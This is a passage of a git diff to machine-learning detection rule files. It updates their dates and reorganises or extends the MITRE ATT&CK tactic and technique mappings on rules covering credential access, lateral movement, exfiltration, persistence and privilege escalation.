Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/ml/credential_access_ml_windows_anomalous_metadata_process.toml b/rules/ml/credential_access_ml_windows_anomalous_metadata_process.toml index 999853954af..fb80318ed02 100644 --- a/rules/ml/credential_access_ml_windows_anomalous_metadata_process.toml +++ b/rules/ml/credential_access_ml_windows_anomalous_metadata_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/22" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] anomaly_threshold = 50 @@ -115,19 +115,31 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" reference = "https://attack.mitre.org/techniques/T1552/" + [[rule.threat.technique.subtechnique]] id = "T1552.005" name = "Cloud Instance Metadata API" reference = "https://attack.mitre.org/techniques/T1552/005/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1580" +name = "Cloud Infrastructure Discovery" +reference = "https://attack.mitre.org/techniques/T1580/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/ml/execution_ml_windows_anomalous_script.toml b/rules/ml/execution_ml_windows_anomalous_script.toml index af93615b61d..300b735984c 100644 --- a/rules/ml/execution_ml_windows_anomalous_script.toml +++ b/rules/ml/execution_ml_windows_anomalous_script.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] anomaly_threshold = 50 @@ -120,19 +120,36 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1027" +name = "Obfuscated Files or Information" +reference = "https://attack.mitre.org/techniques/T1027/" + +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/ml/initial_access_ml_auth_rare_source_ip_for_a_user.toml b/rules/ml/initial_access_ml_auth_rare_source_ip_for_a_user.toml index 0157a2de1c2..25ab0ac2b9e 100644 --- a/rules/ml/initial_access_ml_auth_rare_source_ip_for_a_user.toml +++ b/rules/ml/initial_access_ml_auth_rare_source_ip_for_a_user.toml @@ -2,7 +2,7 @@ creation_date = "2021/06/10" integration = ["auditd_manager", "endpoint", "system"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -132,14 +132,26 @@ Machine learning models analyze login patterns to identify atypical IP addresses - Implement IP whitelisting or geofencing rules to restrict access from unexpected locations, enhancing future detection and prevention.""" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/ml/initial_access_ml_windows_rare_user_type10_remote_login.toml b/rules/ml/initial_access_ml_windows_rare_user_type10_remote_login.toml index b4a53fb620b..d75624732fc 100644 --- a/rules/ml/initial_access_ml_windows_rare_user_type10_remote_login.toml +++ b/rules/ml/initial_access_ml_windows_rare_user_type10_remote_login.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] anomaly_threshold = 50 @@ -89,14 +89,31 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.001" +name = "Remote Desktop Protocol" +reference = "https://attack.mitre.org/techniques/T1021/001/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/ml/ml_high_count_events_for_a_host_name.toml b/rules/ml/ml_high_count_events_for_a_host_name.toml index 3af1d24172b..4baed3cf752 100644 --- a/rules/ml/ml_high_count_events_for_a_host_name.toml +++ b/rules/ml/ml_high_count_events_for_a_host_name.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["endpoint"] maturity = "production" -updated_date = "2025/11/18" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -95,23 +95,23 @@ The detection of a spike in host-based traffic leverages machine learning to ide [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - [[rule.threat.technique]] id = "T1041" name = "Exfiltration Over C2 Channel" reference = "https://attack.mitre.org/techniques/T1041/" -[[rule.threat]] -framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1048" +name = "Exfiltration Over Alternative Protocol" +reference = "https://attack.mitre.org/techniques/T1048/" [rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1498" @@ -123,28 +123,59 @@ id = "T1499" name = "Endpoint Denial of Service" reference = "https://attack.mitre.org/techniques/T1499/" +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" + [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - [[rule.threat.technique]] id = "T1204" name = "User Execution" reference = "https://attack.mitre.org/techniques/T1204/" +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1068" -name = "Exploitation for Privilege Escalation" -reference = "https://attack.mitre.org/techniques/T1068/" +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1046" +name = "Network Service Discovery" +reference = "https://attack.mitre.org/techniques/T1046/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/ml/ml_high_count_network_denies.toml b/rules/ml/ml_high_count_network_denies.toml index 39e7bd4d1f3..0cd21f75e73 100644 --- a/rules/ml/ml_high_count_network_denies.toml +++ b/rules/ml/ml_high_count_network_denies.toml @@ -2,7 +2,7 @@ creation_date = "2021/04/05" integration = ["endpoint", "network_traffic"] maturity = "production" -updated_date = "2025/11/18" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -114,62 +114,67 @@ Firewalls and ACLs are critical in controlling network traffic, blocking unautho [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - [[rule.threat.technique]] id = "T1041" name = "Exfiltration Over C2 Channel" reference = "https://attack.mitre.org/techniques/T1041/" +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" +[[rule.threat.technique]] +id = "T1018" +name = "Remote System Discovery" +reference = "https://attack.mitre.org/techniques/T1018/" [[rule.threat.technique]] id = "T1046" name = "Network Service Discovery" reference = "https://attack.mitre.org/techniques/T1046/" +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" + [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0043" -name = "Reconnaissance" -reference = "https://attack.mitre.org/tactics/TA0043/" - [[rule.threat.technique]] id = "T1590" name = "Gather Victim Network Information" reference = "https://attack.mitre.org/techniques/T1590/" -[[rule.threat]] -framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1595" +name = "Active Scanning" +reference = "https://attack.mitre.org/techniques/T1595/" [rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" +id = "TA0043" +name = "Reconnaissance" +reference = "https://attack.mitre.org/tactics/TA0043/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1498" @@ -181,3 +186,7 @@ id = "T1499" name = "Endpoint Denial of Service" reference = "https://attack.mitre.org/techniques/T1499/" +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/ml/ml_linux_anomalous_network_port_activity.toml b/rules/ml/ml_linux_anomalous_network_port_activity.toml index be92e900df7..c6d68ce99dd 100644 --- a/rules/ml/ml_linux_anomalous_network_port_activity.toml +++ b/rules/ml/ml_linux_anomalous_network_port_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["auditd_manager", "endpoint"] maturity = "production" -updated_date = "2025/11/18" +updated_date = "2026/03/24" [rule] anomaly_threshold = 50 @@ -121,11 +121,6 @@ In Linux environments, network ports facilitate communication between applicatio [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" @@ -136,9 +131,24 @@ id = "T1571" name = "Non-Standard Port" reference = "https://attack.mitre.org/techniques/T1571/" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1205" +name = "Traffic Signaling" +reference = "https://attack.mitre.org/techniques/T1205/" + +[[rule.threat.technique.subtechnique]] +id = "T1205.001" +name = "Port Knocking" +reference = "https://attack.mitre.org/techniques/T1205/001/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" @@ -147,13 +157,12 @@ reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - [[rule.threat.technique]] id = "T1041" name = "Exfiltration Over C2 Channel" reference = "https://attack.mitre.org/techniques/T1041/" +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/ml/ml_low_count_events_for_a_host_name.toml b/rules/ml/ml_low_count_events_for_a_host_name.toml index d2128f0bf36..1e9be8d7329 100644 --- a/rules/ml/ml_low_count_events_for_a_host_name.toml +++ b/rules/ml/ml_low_count_events_for_a_host_name.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["endpoint"] maturity = "production" -updated_date = "2025/11/18" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -95,25 +95,30 @@ Host-based traffic monitoring is crucial for identifying anomalies in network ac [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" +[[rule.threat.technique]] +id = "T1489" +name = "Service Stop" +reference = "https://attack.mitre.org/techniques/T1489/" [[rule.threat.technique]] id = "T1499" name = "Endpoint Denial of Service" reference = "https://attack.mitre.org/techniques/T1499/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/ml/ml_packetbeat_rare_server_domain.toml b/rules/ml/ml_packetbeat_rare_server_domain.toml index 21d0d1aac74..dd5fc5ab525 100644 --- a/rules/ml/ml_packetbeat_rare_server_domain.toml +++ b/rules/ml/ml_packetbeat_rare_server_domain.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["auditd_manager", "endpoint"] maturity = "production" -updated_date = "2025/11/18" +updated_date = "2026/03/24" [rule] anomaly_threshold = 50 @@ -121,11 +121,6 @@ Machine learning models analyze network traffic to identify atypical domain name [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - [[rule.threat.technique]] id = "T1566" name = "Phishing" @@ -141,6 +136,11 @@ id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" @@ -152,11 +152,6 @@ reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" @@ -167,16 +162,30 @@ id = "T1071.001" name = "Web Protocols" reference = "https://attack.mitre.org/techniques/T1071/001/" -[[rule.threat]] -framework = "MITRE ATT&CK" +[[rule.threat.technique.subtechnique]] +id = "T1071.004" +name = "DNS" +reference = "https://attack.mitre.org/techniques/T1071/004/" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" [rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1041" name = "Exfiltration Over C2 Channel" reference = "https://attack.mitre.org/techniques/T1041/" +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/ml/ml_rare_destination_country.toml b/rules/ml/ml_rare_destination_country.toml index 7c1f674b243..300ac8b85d1 100644 --- a/rules/ml/ml_rare_destination_country.toml +++ b/rules/ml/ml_rare_destination_country.toml @@ -2,7 +2,7 @@ creation_date = "2021/04/05" integration = ["endpoint", "network_traffic"] maturity = "production" -updated_date = "2025/11/18" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -118,11 +118,6 @@ Machine learning models analyze network logs to identify traffic to uncommon des [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - [[rule.threat.technique]] id = "T1566" name = "Phishing" @@ -138,6 +133,11 @@ id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" @@ -149,11 +149,6 @@ reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" @@ -164,14 +159,14 @@ id = "T1105" name = "Ingress Tool Transfer" reference = "https://attack.mitre.org/techniques/T1105/" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - [[rule.threat.technique]] id = "T1041" name = "Exfiltration Over C2 Channel" @@ -182,3 +177,30 @@ id = "T1048" name = "Exfiltration Over Alternative Protocol" reference = "https://attack.mitre.org/techniques/T1048/" +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.001" +name = "Malicious Link" +reference = "https://attack.mitre.org/techniques/T1204/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/ml/ml_spike_in_traffic_to_a_country.toml b/rules/ml/ml_spike_in_traffic_to_a_country.toml index 9c9c130f549..97ff791d58d 100644 --- a/rules/ml/ml_spike_in_traffic_to_a_country.toml +++ b/rules/ml/ml_spike_in_traffic_to_a_country.toml @@ -2,7 +2,7 @@ creation_date = "2021/04/05" integration = ["endpoint", "network_traffic"] maturity = "production" -updated_date = "2025/11/18" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -118,52 +118,61 @@ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - [[rule.threat.technique]] id = "T1041" name = "Exfiltration Over C2 Channel" reference = "https://attack.mitre.org/techniques/T1041/" -[[rule.threat]] -framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1048" +name = "Exfiltration Over Alternative Protocol" +reference = "https://attack.mitre.org/techniques/T1048/" [rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" - [[rule.threat.technique]] id = "T1046" name = "Network Service Discovery" reference = "https://attack.mitre.org/techniques/T1046/" +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" + [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0043" -name = "Reconnaissance" -reference = "https://attack.mitre.org/tactics/TA0043/" - [[rule.threat.technique]] id = "T1595" name = "Active Scanning" reference = "https://attack.mitre.org/techniques/T1595/" +[[rule.threat.technique.subtechnique]] +id = "T1595.001" +name = "Scanning IP Blocks" +reference = "https://attack.mitre.org/techniques/T1595/001/" + +[rule.threat.tactic] +id = "TA0043" +name = "Reconnaissance" +reference = "https://attack.mitre.org/tactics/TA0043/" diff --git a/rules/ml/ml_windows_anomalous_network_activity.toml b/rules/ml/ml_windows_anomalous_network_activity.toml index 3df432d3263..0f4ce5e16ba 100644 --- a/rules/ml/ml_windows_anomalous_network_activity.toml +++ b/rules/ml/ml_windows_anomalous_network_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/11/18" +updated_date = "2026/03/24" [rule] anomaly_threshold = 50 @@ -92,19 +92,24 @@ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" @@ -121,26 +126,30 @@ reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - [[rule.threat.technique]] id = "T1041" name = "Exfiltration Over C2 Channel" reference = "https://attack.mitre.org/techniques/T1041/" +[[rule.threat.technique]] +id = "T1048" +name = "Exfiltration Over Alternative Protocol" +reference = "https://attack.mitre.org/techniques/T1048/" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/ml/persistence_ml_rare_process_by_host_windows.toml b/rules/ml/persistence_ml_rare_process_by_host_windows.toml index bea679b8ed2..9c3f5c00f2b 100644 --- a/rules/ml/persistence_ml_rare_process_by_host_windows.toml +++ b/rules/ml/persistence_ml_rare_process_by_host_windows.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/02/27" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -170,19 +170,36 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1569" +name = "System Services" +reference = "https://attack.mitre.org/techniques/T1569/" + +[[rule.threat.technique.subtechnique]] +id = "T1569.002" +name = "Service Execution" +reference = "https://attack.mitre.org/techniques/T1569/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/ml/persistence_ml_windows_anomalous_process_creation.toml b/rules/ml/persistence_ml_windows_anomalous_process_creation.toml index f498ba198b9..e075e166adc 100644 --- a/rules/ml/persistence_ml_windows_anomalous_process_creation.toml +++ b/rules/ml/persistence_ml_windows_anomalous_process_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -173,14 +173,41 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique]] +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" + +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/ml/persistence_ml_windows_anomalous_service.toml b/rules/ml/persistence_ml_windows_anomalous_service.toml index de821662148..bf7341edc93 100644 --- a/rules/ml/persistence_ml_windows_anomalous_service.toml +++ b/rules/ml/persistence_ml_windows_anomalous_service.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] anomaly_threshold = 50 @@ -118,19 +118,36 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1569" +name = "System Services" +reference = "https://attack.mitre.org/techniques/T1569/" + +[[rule.threat.technique.subtechnique]] +id = "T1569.002" +name = "Service Execution" +reference = "https://attack.mitre.org/techniques/T1569/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/ml/privilege_escalation_ml_linux_anomalous_sudo_activity.toml b/rules/ml/privilege_escalation_ml_linux_anomalous_sudo_activity.toml index c41b0d62e61..d02f2f59c77 100644 --- a/rules/ml/privilege_escalation_ml_linux_anomalous_sudo_activity.toml +++ b/rules/ml/privilege_escalation_ml_linux_anomalous_sudo_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/03" integration = ["auditd_manager", "endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -122,26 +122,18 @@ Sudo is a command in Unix-like systems that allows permitted users to execute co - Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected.""" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" +[[rule.threat.technique.subtechnique]] +id = "T1548.003" +name = "Sudo and Sudo Caching" +reference = "https://attack.mitre.org/techniques/T1548/003/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/ml/privilege_escalation_ml_windows_rare_user_runas_event.toml b/rules/ml/privilege_escalation_ml_windows_rare_user_runas_event.toml index 8485f372dbb..45c5273ac12 100644 --- a/rules/ml/privilege_escalation_ml_windows_rare_user_runas_event.toml +++ b/rules/ml/privilege_escalation_ml_windows_rare_user_runas_event.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] anomaly_threshold = 50 @@ -119,8 +119,22 @@ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = 